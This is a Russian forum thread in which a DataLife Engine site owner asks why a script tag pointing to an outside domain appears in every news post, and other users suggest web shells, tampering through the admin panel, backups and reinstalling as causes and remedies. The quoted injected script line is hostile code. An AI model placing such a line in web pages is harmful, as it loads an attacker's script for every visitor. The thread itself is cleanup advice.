Вопрос только для спеца по DLE

12
mavrin82
На сайте с 29.06.2010
Offline
109
1095

Последнее время один г.с. помечен в выдаче как опасный и при редактировании материалов, в каждой новости появился вот такой код

<script src="http://idealvk.msk.ru/71a80b64cdf8d9c4213dd78354260ac2.js" type="text/javascript"></script>


Кто знает, что это за скрипт и где его искать?

Продвижение сайтов ( https://amuletdm.ru/ ) Аудит сайта ( https://amuletdm.ru/ ) Создание сайтов ( https://amuletdm.ru/ )
3BEPEK
На сайте с 30.11.2008
Offline
211
#1

Была такая же проблема. Этот код и возможно не только он теперь в каждой новости, и БД он везде, я лично ставил самый последний движок, заливал старую чистую БД. И больше меня эта проблема не мучала.

С этим же кодом потом появилось много других со времен, кликандеры всякие и прочая нечесть. Сайт был запущен, так как находился в армии.

Причем так было на десятке сайтов, тупо взял другой хостинг, востановил все из старых бэкапов (благо пока в армии был ни чего на сайте нового не добавлялось), обновил везде движки.

➡️ ➡️ Лучший хостинг на земле! Ответ саппорта в течении 1-2 минут. Попробуйте и скажите мне - Спасибо ( https://vk.cc/9jsY3X ).
ingmar
На сайте с 11.01.2009
Offline
111
#2

Тут и "спецом" быть не надо, проверяйте файлы шаблона, судя по всему смотреть надо shortstory и fullstory. Ну и проверяйте серв на шеллы, где-то он лежит.

https://white-master.ru/ (https://white-master.ru/) разработка продающих сайтов
3BEPEK
На сайте с 30.11.2008
Offline
211
#3
ingmar:
Тут и "спецом" быть не надо, проверяйте файлы шаблона, судя по всему смотреть надо shortstory и fullstory. Ну и проверяйте серв на шеллы, где-то он лежит.

Это шеллы...

mavrin82
На сайте с 29.06.2010
Offline
109
#4
3BEPEK:
Это шеллы...

А поподробнее можно?

Где их именно искать и что делать с ними, как они выглядят?

Вот как выглядит фуллстори:

{poll}

<div class="cat">{link-category} </div>

<div class="tit">

<div class="tit_bg_l">

<div class="tit_bg_r">

<h1>{title}</h1>

<div class="aut">Опубликовал: {author}</div>

<script rel="nofollow" src="http://odnaknopka.ru/ok3.js" type="text/javascript"></script>

<div class="tit_s" align="center">

{date}

<br>

{favorites}

</div>

<div class="tit_f">

Просмотров: {views}

<br>

Комментарии: {comments-num}

</div>

</div>

<div class="short">

{full-story}

[group=5]

<div class="scriptcode">Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь. Мы рекомендуем Вам <a href="/index.php?do=register">зарегистрироваться</a> либо войти на сайт под своим именем.</div>

[/group]

</div>

</div>

<noindex><script type="text/javascript" src="//yandex.st/share/share.js" charset="utf-8"></script>

<div class="yashare-auto-init" data-yashareType="button" data-yashareQuickServices="yaru,vkontakte,facebook,twitter,odnoklassniki,moimir"></div> </noindex>

<div class="short_bot">

{rating}

</div>

<div class="bl">

<div class="br">

</div>

</div>

</div>

{related-news}

ingmar
На сайте с 11.01.2009
Offline
111
#5
Это шеллы...

Спасибо, кэп.

А поподробнее можно?

Чистите шаблон от этой гадости, потом если движок стоит коробочный без большого количества модулей, то стоит перезалить файлы из чистой сборки. Далее проверяем сервер на наличие файлов не входящих в коробочную поставку движка, обычно шеллы пихают в upload и его подпапки, находил однажды и в engine/classes, также нередко в самих папках шаблонов. Плюс ко всему в данном разделе есть куча тем подобного содержания и там нередко отписываются знающие люди с грамотными замечаниями. Удачи.

ingmar добавил 07.10.2011 в 16:17

Вот как выглядит фуллстори:

А как shortstory?

Также это ваше?

<script rel="nofollow" src="http://odnaknopka.ru/ok3.js" type="text/javascript"></script>
mavrin82
На сайте с 29.06.2010
Offline
109
#6
ingmar:

А как shortstory?

Вот как шорт:

<div class="cat">{approve} {link-category} </div>

<div class="tit">

<div class="tit_bg_l">

<div class="tit_bg_r">

{title}

<div class="aut">Опубликовал: {author}</div>

<div class="tit_s" align="center">

{date}

<br>

{favorites}

</div>

<div class="tit_f">

Просмотров: {views}

<br>

Комментарии: {comments-num}

</div>

</div>

</div>

<div class="short">

{short-story}

</div>

<div class="short_bot">

<div class="full_link">

[full-link]<img src="{THEME}/images/spacer.gif" width="112" height="24" border="0" alt="" />[/full-link]

</div>

<div class="rat">

{rating}

</div>

</div>

<div class="bl">

<div class="br">

</div>

</div>

<noindex><script type="text/javascript" src="//yandex.st/share/share.js" charset="utf-8"></script>

<div class="yashare-auto-init" data-yashareType="button" data-yashareQuickServices="yaru,vkontakte,facebook,twitter,odnoklassniki,moimir"></div> </noindex>

</div>

грац.
На сайте с 13.08.2010
Offline
176
#7

Да в БД в каждую новость запихано, че тут думать-то

ingmar
На сайте с 11.01.2009
Offline
111
#8
Да в БД в каждую новость запихано, че тут думать-то

Далеко не факт, хотя как вариант, но к БД тяжелее доступ получить. Сделать поиск по БД и заменить ненужный код. Возможно также что код встроен через show.short.php. А по сабжу надо смотреть и щупать, куда копать Вам сказали.

KILLER666
На сайте с 22.01.2011
Offline
20
#9

100% в базе это появилось из админки, нечего давать доступ кому не поподя. Просто сделали в админке замену в бд всех постов вот и весь секрет

mavrin82
На сайте с 29.06.2010
Offline
109
#10
KILLER666:
100% в базе это появилось из админки, нечего давать доступ кому не поподя. Просто сделали в админке замену в бд всех постов вот и весь секрет

А как в базе данных он выглядеть то должен этот код не подскажите.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий